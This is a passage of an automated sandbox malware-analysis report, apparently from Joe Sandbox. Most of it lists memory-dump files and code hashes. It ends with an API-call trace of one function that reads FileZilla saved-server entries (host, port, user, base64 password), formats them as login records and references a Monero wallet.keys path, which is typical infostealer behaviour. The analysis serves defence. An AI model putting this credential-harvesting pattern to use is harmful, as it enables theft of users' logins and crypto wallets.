                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac96961764b2d35450ff9e850d9adbd84838bef0daeab6c31776014814c5f119
                  • Instruction ID: 2d2cf63ec494daf952179407cc7441456a16f2a909bbda0f9889e57dc9110063
                  • Opcode Fuzzy Hash: ac96961764b2d35450ff9e850d9adbd84838bef0daeab6c31776014814c5f119
                  • Instruction Fuzzy Hash: 5942D4F3A0C2049FD3046E29EC8577AFBE9EF94720F1A892DE6C483744E63598458797
                  Function 00E393D0 Relevance: .2, Instructions: 208COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d83897f0541f83be60fcdaa05ae66ecb03d97b2b97f7715001c5e7dddd66ec27
                  • Instruction ID: cea1703167b8b71435f1a5c8aa43f2c77a26530485690bb867049acfcb3fb63e
                  • Opcode Fuzzy Hash: d83897f0541f83be60fcdaa05ae66ecb03d97b2b97f7715001c5e7dddd66ec27
                  • Instruction Fuzzy Hash: B75108F3A186005FF348BE2DDC8577AB6D5EF88320F5A453DDAC9C7784E93958018692
                  Function 00E7F9BE Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8e27afb8940ba3a695a49ef20eec170914d3bd772b7d95b8a6f901085c8d403
                  • Instruction ID: c3fe44360a76d7bad1766b2c5973e1c16c6e34f0f9a8ad7766eabdec2b7ee48e
                  • Opcode Fuzzy Hash: d8e27afb8940ba3a695a49ef20eec170914d3bd772b7d95b8a6f901085c8d403
                  • Instruction Fuzzy Hash: 00516EF3A192055FE300AD3CDD89776B7D6EBD0320F1E863DEA84C7749E93899058691
                  Function 00D7FF2C Relevance: .2, Instructions: 179COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b68d20486330016bc2ba3d29838127ce98a219f14751d7682740c01ac5c78fa5
                  • Instruction ID: a005523bffbad952d781e87707a3dba8624502a65edf794f0efdd173db2eda6c
                  • Opcode Fuzzy Hash: b68d20486330016bc2ba3d29838127ce98a219f14751d7682740c01ac5c78fa5
                  • Instruction Fuzzy Hash: 315158F3F092148BF3481A39DD69766B6C69BD0320F2F863EDA88973C0EC7D08060285
                  Function 00DB7F8D Relevance: .2, Instructions: 161COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c549721a1ede6824e11c7aaf5e5219888ec57e10957d5a5b47d1583b1d6f25f
                  • Instruction ID: 2a2428a79ba0659471cd1335a948e81b179210ee6fb2efe8870d13f281b4de90
                  • Opcode Fuzzy Hash: 7c549721a1ede6824e11c7aaf5e5219888ec57e10957d5a5b47d1583b1d6f25f
                  • Instruction Fuzzy Hash: D54128F3E086148BF3046E68EDC577AB7D9EB54320F2A463D9B94937C0E9791D0486C6
                  Function 00E4C5E0 Relevance: .2, Instructions: 154COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b1ee7f930988c97a670ac01aa61683de59d8ffc8c04153f79563314ce3b3769
                  • Instruction ID: 7401ceef43ae8a726329322882378d60493107ba1148e08e43addf8831f7eaa5
                  • Opcode Fuzzy Hash: 2b1ee7f930988c97a670ac01aa61683de59d8ffc8c04153f79563314ce3b3769
                  • Instruction Fuzzy Hash: 8F4144F3E143144BF748593DED88766769BDBD4320F2B823EDA8897388EC784D0A4285
                  Function 00D98902 Relevance: .1, Instructions: 144COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fbf9be62d381d533e4392b65ccf9c6153d10f1f94ea988021d3afd5816e5a4b7
                  • Instruction ID: 2bf3ecd791c0a2bc2a96f828c43a26ae514c1ab66fd4767559c75d1fb6e0fe5d
                  • Opcode Fuzzy Hash: fbf9be62d381d533e4392b65ccf9c6153d10f1f94ea988021d3afd5816e5a4b7
                  • Instruction Fuzzy Hash: 034128F3E192249FE3155D2CDCC57A7B796DB84324F1A863EDB8497784EC39480542C6
                  Function 00D85A3F Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 725503db8ad5dbda954da546085e6dd98fc3ca13d4f56d3e6ef8df3191cef82b
                  • Instruction ID: 32ef09a13990c3d7d22bfc66142e19d52bcaf55b0ced99f9ef9f69e10a22ca63
                  • Opcode Fuzzy Hash: 725503db8ad5dbda954da546085e6dd98fc3ca13d4f56d3e6ef8df3191cef82b
                  • Instruction Fuzzy Hash: 424195B29097109FE745AE2ACC4466AF3E6FFC4720F1A882DDAC4C7744DB355841C796
                  Function 00F6209A Relevance: .1, Instructions: 129COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08d1e029d994929978cacb6531de72c19f4988f3d1769454a90d28ec5799526c
                  • Instruction ID: 26f5e3d9458b75263ffc85fe999a1b615f0059d422a1d5cbdd7748454116e41a
                  • Opcode Fuzzy Hash: 08d1e029d994929978cacb6531de72c19f4988f3d1769454a90d28ec5799526c
                  • Instruction Fuzzy Hash: D24136F360CE04DBE284AF28EC5677EB7E4EB94710F25492DD68697B04E6395400A693
                  Function 00F6B070 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b1e001d8de4f1d73d3be073b041a1d64030752d1f3260b81672fd0dbb3b2b5b
                  • Instruction ID: 73891b71a0efeb7aed06900d98c7c17e020adf5bc02376426453b353230a08ea
                  • Opcode Fuzzy Hash: 4b1e001d8de4f1d73d3be073b041a1d64030752d1f3260b81672fd0dbb3b2b5b
                  • Instruction Fuzzy Hash: B201043355D010FFD311A9399C207ABB7A6AB96390F374829C8C7D7200DB7154C2B692
                  Function 00B19750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00B10250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00B20DBA,00B20DB7,00B20DB6,00B20DB3), ref: 00B10362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B10369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B10385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B103CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B103DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00B10419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B10463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B10532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B10562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00B10571
                  • lstrcat.KERNEL32(?,url: ), ref: 00B10580
                  • lstrcat.KERNEL32(?,00000000), ref: 00B10593
                  • lstrcat.KERNEL32(?,00B21678), ref: 00B105A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00B105B5
                  • lstrcat.KERNEL32(?,00B2167C), ref: 00B105C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00B105D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00B105E6
                  • lstrcat.KERNEL32(?,00B21688), ref: 00B105F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00B10604
                  • lstrcat.KERNEL32(?,00000000), ref: 00B10617
